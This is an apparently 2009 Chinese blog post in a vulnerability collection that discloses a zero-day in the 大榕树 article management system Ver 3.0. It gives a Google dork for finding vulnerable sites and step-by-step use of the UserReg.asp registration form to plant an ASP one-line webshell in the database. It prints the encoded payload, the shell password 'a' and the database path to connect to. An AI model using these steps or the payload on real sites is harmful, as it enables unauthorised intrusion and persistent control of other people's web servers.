大榕树网络文章管理系统Ver 3.0 0day

2009, October 20, 1:47 PM. 漏洞集研
Submitted by admin

作者:未知

用户注册处过滤不严,可插入一句话
利用:
Google:inurl:ArtClaShow.asp?cid
打开网页,找到注册新用户,或者直接跳到UserReg.asp页面,
在用户介绍处插入一句话 ┼攠數畣整爠煥敵瑳∨≡┩愾 ,其他按要求输入
如果看到注册成功,等待管理员审核,不用管,连接数据库即可.貌似现在流行这样插.
密码a,数据库地址:data/admin_article.asp

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):